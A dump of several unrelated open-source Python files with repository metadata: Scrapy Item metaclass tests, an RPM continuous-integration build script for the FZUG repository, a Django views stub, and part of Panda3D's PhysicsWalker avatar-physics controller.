fields = {"update": Field(default="C")}
save = Field(default="C")
class D(B, C):
fields = {"update": Field(default="D")}
load = Field(default="D")
self.assertEqual(D(save="X")["save"], "X")
self.assertEqual(D(load="X")["load"], "X")
self.assertEqual(
D.fields,
{
"save": {"default": "C"},
"load": {"default": "D"},
"update": {"default": "D"},
},
)
# D class inverted
class E(C, B):
load = Field(default="E")
self.assertEqual(E(save="X")["save"], "X")
self.assertEqual(E(load="X")["load"], "X")
self.assertEqual(
E.fields,
{
"save": {"default": "C"},
"load": {"default": "E"},
"update": {"default": "C"},
},
)
def test_metaclass_multiple_inheritance_without_metaclass(self):
class A(Item):
fields = {"load": Field(default="A")}
save = Field(default="A")
class B(A):
pass
class C:
fields = {"load": Field(default="C")}
not_allowed = Field(default="not_allowed")
save = Field(default="C")
class D(B, C):
pass
self.assertRaises(KeyError, D, not_allowed="value")
self.assertEqual(D(save="X")["save"], "X")
self.assertEqual(D.fields, {"save": {"default": "A"}, "load": {"default": "A"}})
# D class inverted
class E(C, B):
pass
self.assertRaises(KeyError, E, not_allowed="value")
self.assertEqual(E(save="X")["save"], "X")
self.assertEqual(E.fields, {"save": {"default": "A"}, "load": {"default": "A"}})
def test_to_dict(self):
class TestItem(Item):
name = Field()
i = TestItem()
i["name"] = "John"
self.assertEqual(dict(i), {"name": "John"})
def test_copy(self):
class TestItem(Item):
name = Field()
item = TestItem({"name": "lower"})
copied_item = item.copy()
self.assertNotEqual(id(item), id(copied_item))
copied_item["name"] = copied_item["name"].upper()
self.assertNotEqual(item["name"], copied_item["name"])
def test_deepcopy(self):
class TestItem(Item):
tags = Field()
item = TestItem({"tags": ["tag1"]})
copied_item = item.deepcopy()
item["tags"].append("tag2")
assert item["tags"] != copied_item["tags"]
class ItemMetaTest(unittest.TestCase):
def test_new_method_propagates_classcell(self):
new_mock = mock.Mock(side_effect=ABCMeta.__new__)
base = ItemMeta.__bases__[0]
with mock.patch.object(base, "__new__", new_mock):
class MyItem(Item):
def f(self):
# For rationale of this see:
# https://github.com/python/cpython/blob/ee1a81b77444c6715cbe610e951c655b6adab88b/Lib/test/test_super.py#L222
return (
__class__ # noqa https://github.com/scrapy/scrapy/issues/2836
)
MyItem()
(first_call, second_call) = new_mock.call_args_list[-2:]
mcs, class_name, bases, attrs = first_call[0]
assert "__classcell__" not in attrs
mcs, class_name, bases, attrs = second_call[0]
assert "__classcell__" in attrs
class ItemMetaClassCellRegression(unittest.TestCase):
def test_item_meta_classcell_regression(self):
class MyItem(Item, metaclass=ItemMeta):
def __init__(self, *args, **kwargs):
                # This call to super() triggers the __classcell__ propagation
                # requirement. When not done properly, it raises an error:
# TypeError: __class__ set to <class '__main__.MyItem'>
# defining 'MyItem' as <class '__main__.MyItem'>
super().__init__(*args, **kwargs)
if __name__ == "__main__":
unittest.main()
|
f89e9d58c9807d88c3c1a77118f714d3685dfd93
|
8c8a073459dcd834cebac51a2c6ad3a3c0f59fcd
|
/repos/cibuild.py
|
10cf8d84c983b4f77ec8601d0e92615640ab0011
|
[] |
no_license
|
FZUG/repo
|
a8789d57f94462d3df4e86a73005405314692989
|
b2474d8aa6f8f4404921f73a47bed77b54a6ec3f
|
refs/heads/master
| 2023-08-11T01:07:46.099837
| 2022-03-13T16:08:41
| 2022-03-16T14:12:59
| 34,797,461
| 707
| 176
| null | 2022-03-25T22:46:35
| 2015-04-29T14:09:28
|
DIGITAL Command Language
|
UTF-8
|
Python
| false
| false
| 20,954
|
py
|
cibuild.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Author: mosquito
# Email: sensor.wen@gmail.com
# Description: CI build for repo
from subprocess import getoutput, getstatusoutput, call
from urllib.request import urlretrieve
from operator import itemgetter
import urllib.error
import re
import os
import sys
import rpm
import dnf
import json
import shutil
import fnmatch
import argparse
import requests
srcDir = os.path.join(os.getcwd(), 'build')
outDir = os.path.join(os.getcwd(), 'output')
def get_commit_list():
    '''Get the list of commits to process.
Returns:
        Return the list of commit hashes.
'''
commit_list = getoutput('/bin/git rev-list -n100 --abbrev-commit HEAD').split()
commit = getoutput('/bin/git rev-parse --short HEAD~')
if os.getenv('GIT_PREVIOUS_COMMIT'):
commit = os.getenv('GIT_PREVIOUS_COMMIT')[0:7]
if os.getenv('ghprbActualCommit'):
commit_list = commit_list[1:]
code = call(['/bin/git', 'fetch', '-q'])
master_commit_list = getoutput('/bin/git rev-list -n100 --abbrev-commit origin/master').split()
inter_list = list(set(master_commit_list).intersection(set(commit_list)))
inter_list.sort(key=commit_list.index)
commit = inter_list[0]
commit_list = commit_list[0:commit_list.index(commit)]
commit_list.reverse()
return commit_list
def get_file_list(commit):
'''Get modified files for commit.
Args:
commit: commit string.
Returns:
        Return the list of files modified by the commit.
'''
stdout = getoutput('/bin/git show --pretty="%h: %s" --name-status {}'.format(commit))
return list(filter(black_item, re.findall('rpms.*', stdout)))
def black_item(item):
    '''Filter out blacklisted entries.
    Args:
        item: the item string to check against the blacklist.
'''
for black in blackList:
if re.match('.*' + black + '.*', item):
echo('green', 'info:', ' Filter {} file.'.format(item))
return False
return True
def query_package(query):
'''Query package name from remote repository.
Args:
query: A string of query.
Returns:
        Return a list containing the RPM metadata. If the RPM is not found,
        an empty list is returned.
'''
if 'repos' not in globals().keys():
echo('green', 'info:', ' Initial metadata for repository.')
global repos
repos = dnf.Base()
repos.read_all_repos()
repos.fill_sack(load_available_repos=True)
return list(repos.provides(query))
def parse_spec(specFile, cacheFile='.repocache.json'):
'''Parse the Spec file contents.
Args:
specFile: A string of spec file path.
Returns:
        Return a tuple of the Spec file name and its parsed metadata. If the file
        is not found, False is returned.
'''
if os.path.exists(cacheFile):
if 'repocache' not in globals().keys():
echo('green', 'info:', ' Load cache from {} file.'.format(cacheFile))
with open(cacheFile, 'r') as f:
global repocache
repocache = json.loads(f.read())
return specFile, repocache[specFile]
items = lambda t, c: re.findall('%s:\s+(.*)'%t, c)
split_str = lambda l: [re.split('[\s,=|>=|<=]+', i) for i in l]
flat = lambda L: sum(map(flat, L), []) if isinstance(L, list) else [L]
remove_ver = lambda l: [i for i in l if not re.match('^[0-9]', i)]
decode = lambda v: v.decode() if v else v
if os.path.exists(specFile) and specFile.endswith('.spec'):
rpm_info = {}
subpkgs, reqpkgs = [], []
spec = rpm.spec(specFile)
hdr = spec.sourceHeader
reqlist = [decode(i) for i in hdr[rpm.RPMTAG_REQUIRES]]
content = getoutput('/bin/rpmspec -P {}'.format(specFile))
content = content[:content.index('%changelog')]
# subpackages
name = decode(hdr[rpm.RPMTAG_NAME])
subpkgs.append(name)
if re.search('%package', content):
for i in re.findall('%package\s*(.+)', content):
if i.startswith('-n'):
subpkgs.append(re.match('-n\s*(.*)', i).group(1))
else:
subpkgs.append('{}-{}'.format(name, i))
provpkgs = remove_ver(flat(split_str(items('Provides', content)))) + subpkgs
# parse buildrequires
for i in reqlist:
if re.match('.*\((.*)\)', i):
if len(query_package(i)) > 0:
reqpkgs.append(query_package(i)[0][0].name)
else:
reqpkgs.append(i)
rpm_info = {
"name": decode(hdr[rpm.RPMTAG_NAME]),
"epoch": hdr[rpm.RPMTAG_EPOCHNUM],
"version": decode(hdr[rpm.RPMTAG_VERSION]),
"release": decode(hdr[rpm.RPMTAG_RELEASE]),
"vendor": decode(hdr[rpm.RPMTAG_VENDOR]),
"summary": decode(hdr[rpm.RPMTAG_SUMMARY]),
"packager": decode(hdr[rpm.RPMTAG_PACKAGER]),
"group": decode(hdr[rpm.RPMTAG_GROUP]),
"license": decode(hdr[rpm.RPMTAG_LICENSE]),
"url": decode(hdr[rpm.RPMTAG_URL]),
"description": decode(hdr[rpm.RPMTAG_DESCRIPTION]),
"sources": spec.sources,
"patchs": [decode(i) for i in hdr[rpm.RPMTAG_PATCH]],
"build_archs": [decode(i) for i in hdr[rpm.RPMTAG_BUILDARCHS]],
"exclusive_archs": [decode(i) for i in hdr[rpm.RPMTAG_EXCLUSIVEARCH]],
#"build_requires": [i.DNEVR()[2:] for i in rpm.ds(hdr, 'requires')],
"build_requires": sorted(list(set(reqpkgs))),
"requires": remove_ver(flat(split_str(items('\nRequires', content)))),
"recommends": remove_ver(flat(split_str(items('Recommends', content)))),
"supplements": [decode(i) for i in hdr[rpm.RPMTAG_SUPPLEMENTS]],
"suggests": [decode(i) for i in hdr[rpm.RPMTAG_SUGGESTS]],
"enhances": [decode(i) for i in hdr[rpm.RPMTAG_ENHANCES]],
"provides": sorted(list(set(provpkgs))),
"obsoletes": remove_ver(flat(split_str(items('Obsoletes', content)))),
"conflicts": remove_ver(flat(split_str(items('Conflicts', content))))
}
return specFile, rpm_info
return False
def get_sources(itemList, output=srcDir, verb=None):
'''Get source files from local and internet.
Args:
itemList: A list of source files.
output: A string of temp directory.
verb: A bool of verbose.
'''
for item in itemList:
if not os.path.exists(os.path.join(output, item[0].split('/')[-1])):
if item[0].split('://')[0] in ['http', 'https', 'ftp']:
if verb:
echo('cyan', 'verb:', ' downloading {} file.'.format(item[0]))
try:
urlretrieve(item[0], '{}/{}'.format(output, item[0].split('/')[-1]))
#call(['wget', '-q', '-P', output, item[0]])
except Exception as e:
echo('red', 'erro:', ' downloading error. {}'.format(e))
sys.exit(1)
else:
for src in find_files(item[0], 'rpms'):
if verb:
echo('cyan', 'verb:', ' copy {} file to build directory.'.format(src))
shutil.copy(src, output)
def find_files(pattern, path=os.getcwd()):
'''Search specify file.
Args:
        pattern: Shell-style filename pattern (fnmatch wildcard).
path: Search path.
Yields:
        The full paths of matching files.
'''
for root, dirs, files in os.walk(path):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(root, filename)
def build_srpm(specFile, output='build'):
'''Build source rpm.
Args:
specFile: A string of the Spec filename.
output: A string of the SRPM file output directory.
Returns:
Return the SRPM filename.
'''
command = '/bin/rpmbuild ' \
'-D "_topdir ." ' \
'-D "_builddir {out}" ' \
'-D "_buildrootdir {out}" ' \
'-D "_rpmdir {out}" ' \
'-D "_sourcedir {out}" ' \
'-D "_specdir {out}" ' \
'-D "_srcrpmdir {out}" ' \
'-bs {}'.format(specFile, out=output)
return re.search('build.*', getoutput(command)).group()
def build_rpm(srpmFile, release='23', arch='x86_64', output=outDir, opts='',
verb=None, quiet=None):
'''Build rpm.
Args:
srpmFile: A string of SRPM file path.
release: A string of system release version.
arch: A string of system architecture.
output: A string of RPM file output directory.
opts: A string of mock options.
verb: A bool of verbose.
quiet: A bool of quiet.
Returns:
Return the command running log.
'''
if verb:
opts += ' --verbose'
elif quiet:
opts += ' --quiet'
command = '/bin/mock --resultdir={} --root=fedora-{}-{}-rpmfusion_free {} {}'.format(
output, release, arch, opts, srpmFile)
return getstatusoutput(command)
def rpm_lint(repoDir=outDir, time=10, verb=None):
'''Check rpm files.
Args:
repoDir: A string of repository directory.
time: A integer of time(minutes).
verb: A bool of verbose.
Returns:
Return the check result.
'''
opts = '--info' if verb else ''
command = '/bin/find {} -name "*.rpm" -and -ctime -{} | xargs ' \
'/bin/rpmlint {}'.format(repoDir, round(time/60/24, 4), opts)
return getoutput(command)
def create_repo(output=outDir, verb=None, quiet=None):
'''Creates metadata of rpm repository.
Args:
output: A string of RPM metadata output directory.
verb: A bool of verbose.
quiet: A bool of quiet.
Returns:
Return the command running log.
'''
opts = ''
if verb:
opts += ' --verbose'
elif quiet:
opts += ' --quiet'
return getoutput('/bin/createrepo_c {} -d -x *.src.rpm {}'.format(opts, output))
def result(filename, content):
'''Log build result to file.
Args:
filename: A string of filename.
        content: A list of [status, pkgname, release, arch].
'''
result = 'success' if content[0] == 0 else 'fail'
_, pkgname, release, arch = content
if filename == '-':
_pkgname = re.match('.*/(.*-[0-9]{1,2}).*', pkgname).group(1)
pkgname = _pkgname + '.net' if re.match('.*\.net', pkgname) else _pkgname
return pkgname.ljust(35), \
'fc{}-{}'.format(release, arch).ljust(13), \
result
else:
with open(filename, mode='a+') as f:
f.write('{} fc{}-{} {}\n'.format(pkgname, release, arch, result))
echo('green', 'info:', ' Write build result to {} file.'.format(filename))
def parse_args():
'''Parser for command-line options.
Returns:
Return the Namespace object.
'''
parser = argparse.ArgumentParser(description='repository ci builder.')
parser.add_argument('-o', '--output-dir', metavar='PATH', type=str,
dest='outDir', action='store', default=outDir,
help='set rpm package output directory (default: output)')
parser.add_argument('-c', '--commit', metavar='COMMIT', type=str,
dest='commit', action='store', required=False,
help='build the specified commit')
parser.add_argument('-f', '--file', metavar='FILE', type=str,
dest='file', action='append', default=[], required=False,
help='build the specified Spec file')
parser.add_argument('-a', '--arch', metavar='ARCH', type=str,
dest='archs', action='append', required=False,
help='set architecture for build rpm package (default: x86_64, i386)')
parser.add_argument('-r', '--release', metavar='RELEASE', type=str,
dest='releases', action='append', required=False,
help='set release version for build rpm package (default: 22, 23, 24)')
parser.add_argument('-b', '--black-list', metavar='BLACKLIST', type=str,
dest='blacklist', action='append', required=False,
help='set blacklist, skip these items')
parser.add_argument('--mock-opts', metavar='OPTIONS', type=str,
dest='mock', action='store', default='', required=False,
help='set mock command-line options')
parser.add_argument('--createrepo', dest='createrepo', action='store_true',
help='run createrepo to create repository')
parser.add_argument('--rpmlint', dest='rpmlint', action='store_true',
help='check common problems in rpm package')
parser.add_argument('--clean', dest='clean', action='store_true',
help='clean workspace before building')
parser.add_argument('--cache', dest='cache', action='store_true',
help='create metadata cache')
parser.add_argument('--result', metavar='PATH', type=str,
dest='result', action='store', required=False, default='result.log',
                        help='log build result to file (default: result.log)')
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true',
help='be verbose')
parser.add_argument('-q', '--quiet', dest='quiet', action='store_true',
help='be quiet')
parser.add_argument(dest='files', metavar='FILE', type=str, action='store', nargs='*')
return parser.parse_args()
def echo(color=None, *args):
'''Output log with color.
Args:
color: A string of color.
*args: A tuple that include multi content parameters.
'''
if args:
msg1, msg2 = args[0], ' '.join(args[1:])
else:
msg1, msg2 = color, ''
if color == 'red':
print('\033[31m{}\033[0m{}'.format(msg1, msg2))
elif color == 'green':
print('\033[32m{}\033[0m{}'.format(msg1, msg2))
elif color == 'yellow':
print('\033[33m{}\033[0m{}'.format(msg1, msg2))
elif color == 'blue':
print('\033[34m{}\033[0m{}'.format(msg1, msg2))
elif color == 'cyan':
print('\033[36m{}\033[0m{}'.format(msg1, msg2))
elif color and args:
print('{} {} {}'.format(color, msg1, msg2))
else:
print('{}'.format(msg1))
def resolve_depends(pkglist, depdict, verb=None):
'''Resolve dependencies.
Args:
pkglist: A list of pkgname.
depdict: The dict contains the buildrequires, provides and srpm path.
verb: A bool of verbose.
Returns:
        Return a tuple of (srpm paths, spec paths), ordered by dependency score.
'''
_tasks, _specs = [], []
tasks, specs = [], []
for pkg in pkglist:
score = 0
for dep in depdict[pkg][0]:
for pkg2 in pkglist:
if pkg == pkg2:
continue
if dep in depdict[pkg2][1]:
score += 1
_tasks.append({'pkg': depdict[pkg][2], 'score': score})
_specs.append({'spec': depdict[pkg][3], 'score': score})
tasks_by_score = sorted(_tasks, key=itemgetter('score'))
specs_by_score = sorted(_specs, key=itemgetter('score'))
for i in tasks_by_score:
tasks.append(i['pkg'])
for i in specs_by_score:
specs.append(i['spec'])
echo('green', 'info:', ' Resolve dependencies.')
if verb:
echo('cyan', 'verb:', ' build task {}.'.format(tasks))
return tasks, specs
def repo_cache(output=None, verb=None):
'''Create repository cache.
Args:
output: A string of output filename.
verb: A bool of verbose.
'''
cacheDict = {}
for i in find_files('*.spec', 'rpms'):
if verb:
echo('cyan', 'verb:', ' cached {} file.'.format(i))
specFile, specDict = parse_spec(i)
cacheDict.update({specFile: specDict})
with open(output, 'w') as f:
json.dump(cacheDict, f)
def send_comment(content):
'''Send comment to Github.
Args:
content: A string of comments.
Returns:
Return json response from Github API.
'''
pr_url = 'https://api.github.com/repos/FZUG/repo/issues/%s/comments'
pr_num = os.getenv('ghprbPullId')
pr_token = os.getenv('PR_TOKEN')
session = requests.session()
session.headers['Authorization'] = 'token %s' % pr_token
comment = json.dumps({"body": content})
resp = session.post(pr_url % pr_num, data=comment)
return resp.json()
if __name__ == '__main__':
args = parse_args()
Archs = args.archs if args.archs else ['x86_64', 'i386']
Releases = args.releases if args.releases else ['24', '25']
blackList = args.blacklist if args.blacklist else ['electron']
args.file += args.files
if args.cache:
cacheFile = '.repocache.json'
if os.path.exists(cacheFile):
echo('green', 'info:', ' The repo cache exists.')
else:
echo('green', 'info:', ' Create repo cache.')
repo_cache(cacheFile, args.verbose)
sys.exit()
if not sys.stdin.isatty():
args.file += sys.stdin.read().split()
rootDir = args.outDir
if 'REPO_ROOT' in os.environ:
rootDir = os.environ['REPO_ROOT']
mode = 'manual'
if 'GIT_PREVIOUS_COMMIT' in os.environ or 'ghprbActualCommit' in os.environ:
mode = 'ci'
echo('green', 'info:', ' Running as {} mode.'.format(mode))
if args.clean:
if args.verbose:
echo('cyan', 'verb:', ' clean workspace.')
getoutput('/bin/git clean -f -d -x')
if not os.path.isdir(srcDir):
os.mkdir(srcDir)
results = []
if os.path.exists(args.result):
if args.verbose:
echo('cyan', 'verb:', ' load build result from {} file.'.format(args.result))
with open(args.result) as f:
results = re.findall('rpms/.*.spec', f.read())
deps = {}
resultList, pkgs = [], []
for commit in get_commit_list():
commit = args.commit if args.commit else commit
fileList = args.file if args.file else get_file_list(commit)
for filePath in fileList:
if mode == 'manual' and filePath in results:
if args.verbose:
echo('cyan', 'verb:', ' skip {} file.'.format(filePath))
continue
if parse_spec(filePath):
specFile, specDict = parse_spec(filePath)
if args.verbose:
echo('cyan', 'verb:', ' parser {} file.'.format(specFile))
elif mode == 'ci':
echo('green', 'info:', 'Unmodified spec file in commit.')
continue
else:
echo('green', 'info:', 'Unmodified spec file in commit.')
sys.exit()
get_sources(specDict['sources'], verb=args.verbose)
srpmFile = build_srpm(specFile)
echo('green', 'info:', ' Build SRPM -', srpmFile)
if re.match('.*\.net', srpmFile):
key = specDict['name'] + '.net'
else:
key = specDict['name']
# queue
pkgs.append(key)
deps.update({key: [specDict['build_requires'], specDict['provides'], srpmFile, specFile],})
if args.file or args.commit:
break
tasks, specs = resolve_depends(pkgs, deps, verb=args.verbose)
for task in tasks:
for rel in Releases:
for arch in Archs:
outDir = os.path.join(rootDir, rel, arch)
echo('green', 'info:', ' Build RPM {} for fc{} - {}:'.format(task, rel, arch))
value, log = build_rpm(task, release=rel, arch=arch, output=outDir,
opts=args.mock, verb=args.verbose, quiet=args.quiet)
echo(log)
if args.createrepo:
echo('green', 'info:', ' Create metadata for fc{} - {}:\n'.format(rel, arch),
create_repo(outDir, verb=args.verbose, quiet=args.quiet))
if args.rpmlint:
echo('green', 'info:', ' Check RPM {} for fc{} - {}:\n'.format(task, rel, arch),
rpm_lint(outDir, verb=args.verbose))
if mode == 'manual':
result(args.result, [value, specs[tasks.index(task)], rel, arch])
resultList.append(result('-', [value, task, rel, arch]))
build_result = '** Build result **\n'
echo('cyan', '\n** Build result **')
for i in resultList:
build_result += '%s\n' % ''.join(i)
echo(''.join(i))
    # Send build result
if os.getenv('ghprbActualCommit') and send_comment(build_result).get('id'):
echo('green', 'info:', 'Comment sent successfully.')
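# Illustrative invocations based on the argparse options defined above
# (the spec path and commit hash are placeholders):
#   ./cibuild.py -f rpms/foo/foo.spec --createrepo --rpmlint
#   ./cibuild.py --cache                  # build the .repocache.json metadata cache
#   ./cibuild.py -c 0abc123 -r 24 -a x86_64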
|
695df71a36d761836d37f05011181ccb2e743fb5
|
6dfc23ef65e5943712340ef2b4b648cc25ea1fad
|
/2021/07/27/The First Thing You Should Do at the Start of a New Django Project/djangodemo/myproject/myapp/views.py
|
8c278d47420c5ff2a5712e6701fdb8343bfa44aa
|
[
"Unlicense"
] |
permissive
|
PrettyPrinted/youtube_video_code
|
6d265c910de18d780cdb99f7ea11b8b963929dc2
|
5654e5feba854d3b41b8dd75218e0221408e7831
|
refs/heads/master
| 2023-09-04T21:28:57.386174
| 2023-08-11T07:07:45
| 2023-08-11T07:07:45
| 186,743,986
| 698
| 2,347
|
Unlicense
| 2022-10-06T04:06:56
| 2019-05-15T03:40:45
|
HTML
|
UTF-8
|
Python
| false
| false
| 137
|
py
|
views.py
|
from django.shortcuts import render
from django.contrib.auth import get_user_model
User = get_user_model()
# Create your views here.
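# A minimal sketch of a view built on the swappable User model obtained above;
# the "users.html" template name is illustrative and not part of this project.
def user_list(request):
    users = User.objects.all()
    return render(request, "users.html", {"users": users})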
|
4f39f2205e645e5949b48843fe2c187de7b4bc83
|
c7c73566784a7896100e993606e1bd8fdd0ea94e
|
/direct/src/controls/PhysicsWalker.py
|
4575856922d0a6d11735a93a9569a6f613a2924d
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
panda3d/panda3d
|
c3f94df2206ff7cfe4a3b370777a56fb11a07926
|
160ba090a5e80068f61f34fc3d6f49dbb6ad52c5
|
refs/heads/master
| 2023-08-21T13:23:16.904756
| 2021-04-11T22:55:33
| 2023-08-06T06:09:32
| 13,212,165
| 4,417
| 1,072
|
NOASSERTION
| 2023-09-09T19:26:14
| 2013-09-30T10:20:25
|
C++
|
UTF-8
|
Python
| false
| false
| 29,452
|
py
|
PhysicsWalker.py
|
"""
PhysicsWalker.py is for avatars.
A walker control such as this one provides:
- creation of the collision nodes
- handling the keyboard and mouse input for avatar movement
- moving the avatar
it does not:
- play sounds
- play animations
although it does send messages that allow a listener to play sounds or
animations based on walker events.
"""
from direct.directnotify import DirectNotifyGlobal
from direct.showbase import DirectObject
from direct.controls.ControlManager import CollisionHandlerRayStart
from direct.showbase.InputStateGlobal import inputState
from direct.showbase.MessengerGlobal import messenger
from direct.task.Task import Task
from direct.task.TaskManagerGlobal import taskMgr
from direct.extensions_native import Mat3_extensions # pylint: disable=unused-import
from direct.extensions_native import VBase3_extensions # pylint: disable=unused-import
from direct.extensions_native import VBase4_extensions # pylint: disable=unused-import
from panda3d.core import (
BitMask32,
ClockObject,
CollisionHandlerFloor,
CollisionHandlerQueue,
CollisionNode,
CollisionRay,
CollisionSphere,
CollisionTraverser,
ConfigVariableBool,
LRotationf,
Mat3,
NodePath,
Point3,
Vec3,
)
from panda3d.physics import (
ActorNode,
ForceNode,
LinearEulerIntegrator,
LinearFrictionForce,
LinearVectorForce,
PhysicsCollisionHandler,
PhysicsManager,
)
import math
#import LineStream
class PhysicsWalker(DirectObject.DirectObject):
notify = DirectNotifyGlobal.directNotify.newCategory("PhysicsWalker")
wantDebugIndicator = ConfigVariableBool('want-avatar-physics-indicator', False)
useLifter = 0
useHeightRay = 0
# special methods
def __init__(self, gravity = -32.1740, standableGround=0.707,
hardLandingForce=16.0):
assert self.debugPrint(
"PhysicsWalker(gravity=%s, standableGround=%s)"%(
gravity, standableGround))
DirectObject.DirectObject.__init__(self)
self.__gravity=gravity
self.__standableGround=standableGround
self.__hardLandingForce=hardLandingForce
self.needToDeltaPos = 0
self.physVelocityIndicator=None
self.avatarControlForwardSpeed=0
self.avatarControlJumpForce=0
self.avatarControlReverseSpeed=0
self.avatarControlRotateSpeed=0
self.__oldAirborneHeight=None
self.getAirborneHeight=None
self.__oldContact=None
self.__oldPosDelta=Vec3(0)
self.__oldDt=0
self.__speed=0.0
self.__rotationSpeed=0.0
self.__slideSpeed=0.0
self.__vel=Vec3(0.0)
self.collisionsActive = 0
self.isAirborne = 0
self.highMark = 0
def setWalkSpeed(self, forward, jump, reverse, rotate):
assert self.debugPrint("setWalkSpeed()")
self.avatarControlForwardSpeed=forward
self.avatarControlJumpForce=jump
self.avatarControlReverseSpeed=reverse
self.avatarControlRotateSpeed=rotate
def getSpeeds(self):
#assert self.debugPrint("getSpeeds()")
return (self.__speed, self.__rotationSpeed)
def setAvatar(self, avatar):
self.avatar = avatar
if avatar is not None:
self.setupPhysics(avatar)
def setupRay(self, floorBitmask, floorOffset):
# This is a ray cast from your head down to detect floor polygons
# A toon is about 4.0 feet high, so start it there
self.cRay = CollisionRay(0.0, 0.0, CollisionHandlerRayStart, 0.0, 0.0, -1.0)
cRayNode = CollisionNode('PW.cRayNode')
cRayNode.addSolid(self.cRay)
self.cRayNodePath = self.avatarNodePath.attachNewNode(cRayNode)
self.cRayBitMask = floorBitmask
cRayNode.setFromCollideMask(self.cRayBitMask)
cRayNode.setIntoCollideMask(BitMask32.allOff())
if self.useLifter:
# set up floor collision mechanism
self.lifter = CollisionHandlerFloor()
self.lifter.setInPattern("enter%in")
self.lifter.setOutPattern("exit%in")
self.lifter.setOffset(floorOffset)
# Limit our rate-of-fall with the lifter.
# If this is too low, we actually "fall" off steep stairs
# and float above them as we go down. I increased this
# from 8.0 to 16.0 to prevent this
#self.lifter.setMaxVelocity(16.0)
#self.bobNodePath = self.avatarNodePath.attachNewNode("bob")
#self.lifter.addCollider(self.cRayNodePath, self.cRayNodePath)
self.lifter.addCollider(self.cRayNodePath, self.avatarNodePath)
else: # useCollisionHandlerQueue
self.cRayQueue = CollisionHandlerQueue()
self.cTrav.addCollider(self.cRayNodePath, self.cRayQueue)
def determineHeight(self):
"""
returns the height of the avatar above the ground.
If there is no floor below the avatar, 0.0 is returned.
aka get airborne height.
"""
if self.useLifter:
height = self.avatarNodePath.getPos(self.cRayNodePath)
            # If the shadow were not pointed straight down, we would need to
            # get the magnitude of the vector. Since it is straight down, we'll
            # just get the z:
#spammy --> assert self.debugPrint("getAirborneHeight() returning %s"%(height.getZ(),))
assert onScreenDebug.add("height", height.getZ())
return height.getZ() - self.floorOffset
else: # useCollisionHandlerQueue
height = 0.0
#*#self.cRayTrav.traverse(render)
if self.cRayQueue.getNumEntries() != 0:
# We have a floor.
# Choose the highest of the possibly several floors we're over:
self.cRayQueue.sortEntries()
floorPoint = self.cRayQueue.getEntry(0).getFromIntersectionPoint()
height = -floorPoint.getZ()
self.cRayQueue.clearEntries()
if __debug__:
onScreenDebug.add("height", height)
return height
def setupSphere(self, bitmask, avatarRadius):
"""
Set up the collision sphere
"""
# This is a sphere on the ground to detect barrier collisions
self.avatarRadius = avatarRadius
centerHeight = avatarRadius
if self.useHeightRay:
centerHeight *= 2.0
self.cSphere = CollisionSphere(0.0, 0.0, centerHeight, avatarRadius)
cSphereNode = CollisionNode('PW.cSphereNode')
cSphereNode.addSolid(self.cSphere)
self.cSphereNodePath = self.avatarNodePath.attachNewNode(cSphereNode)
self.cSphereBitMask = bitmask
cSphereNode.setFromCollideMask(self.cSphereBitMask)
cSphereNode.setIntoCollideMask(BitMask32.allOff())
# set up collision mechanism
self.pusher = PhysicsCollisionHandler()
self.pusher.setInPattern("enter%in")
self.pusher.setOutPattern("exit%in")
self.pusher.addCollider(self.cSphereNodePath, self.avatarNodePath)
def setupPhysics(self, avatarNodePath):
assert self.debugPrint("setupPhysics()")
# Connect to Physics Manager:
self.actorNode=ActorNode("PW physicsActor")
self.actorNode.getPhysicsObject().setOriented(1)
self.actorNode.getPhysical(0).setViscosity(0.1)
physicsActor=NodePath(self.actorNode)
avatarNodePath.reparentTo(physicsActor)
avatarNodePath.assign(physicsActor)
self.phys=PhysicsManager()
fn=ForceNode("gravity")
fnp=NodePath(fn)
#fnp.reparentTo(physicsActor)
fnp.reparentTo(render)
gravity=LinearVectorForce(0.0, 0.0, self.__gravity)
fn.addForce(gravity)
self.phys.addLinearForce(gravity)
self.gravity = gravity
fn=ForceNode("priorParent")
fnp=NodePath(fn)
fnp.reparentTo(render)
priorParent=LinearVectorForce(0.0, 0.0, 0.0)
fn.addForce(priorParent)
self.phys.addLinearForce(priorParent)
self.priorParentNp = fnp
self.priorParent = priorParent
fn=ForceNode("viscosity")
fnp=NodePath(fn)
#fnp.reparentTo(physicsActor)
fnp.reparentTo(render)
self.avatarViscosity=LinearFrictionForce(0.0, 1.0, 0)
#self.avatarViscosity.setCoef(0.9)
fn.addForce(self.avatarViscosity)
self.phys.addLinearForce(self.avatarViscosity)
self.phys.attachLinearIntegrator(LinearEulerIntegrator())
self.phys.attachPhysicalNode(physicsActor.node())
self.acForce=LinearVectorForce(0.0, 0.0, 0.0)
fn=ForceNode("avatarControls")
fnp=NodePath(fn)
fnp.reparentTo(render)
fn.addForce(self.acForce)
self.phys.addLinearForce(self.acForce)
#self.phys.removeLinearForce(self.acForce)
#fnp.remove()
return avatarNodePath
def initializeCollisions(self, collisionTraverser, avatarNodePath,
wallBitmask, floorBitmask,
avatarRadius = 1.4, floorOffset = 1.0, reach = 1.0):
"""
Set up the avatar collisions
"""
assert self.debugPrint("initializeCollisions()")
assert not avatarNodePath.isEmpty()
self.cTrav = collisionTraverser
self.floorOffset = floorOffset = 7.0
self.avatarNodePath = self.setupPhysics(avatarNodePath)
if self.useHeightRay:
#self.setupRay(floorBitmask, avatarRadius)
self.setupRay(floorBitmask, 0.0)
self.setupSphere(wallBitmask|floorBitmask, avatarRadius)
self.setCollisionsActive(1)
def setAirborneHeightFunc(self, getAirborneHeight):
self.getAirborneHeight = getAirborneHeight
def setAvatarPhysicsIndicator(self, indicator):
"""
indicator is a NodePath
"""
assert self.debugPrint("setAvatarPhysicsIndicator()")
self.cSphereNodePath.show()
if indicator:
# Indicator Node:
change = render.attachNewNode("change")
#change.setPos(Vec3(1.0, 1.0, 1.0))
#change.setHpr(0.0, 0.0, 0.0)
change.setScale(0.1)
#change.setColor(Vec4(1.0, 1.0, 1.0, 1.0))
indicator.reparentTo(change)
indicatorNode = render.attachNewNode("physVelocityIndicator")
#indicatorNode.setScale(0.1)
#indicatorNode.setP(90.0)
indicatorNode.setPos(self.avatarNodePath, 0.0, 0.0, 6.0)
indicatorNode.setColor(0.0, 0.0, 1.0, 1.0)
change.reparentTo(indicatorNode)
self.physVelocityIndicator=indicatorNode
# Contact Node:
contactIndicatorNode = render.attachNewNode("physContactIndicator")
contactIndicatorNode.setScale(0.25)
contactIndicatorNode.setP(90.0)
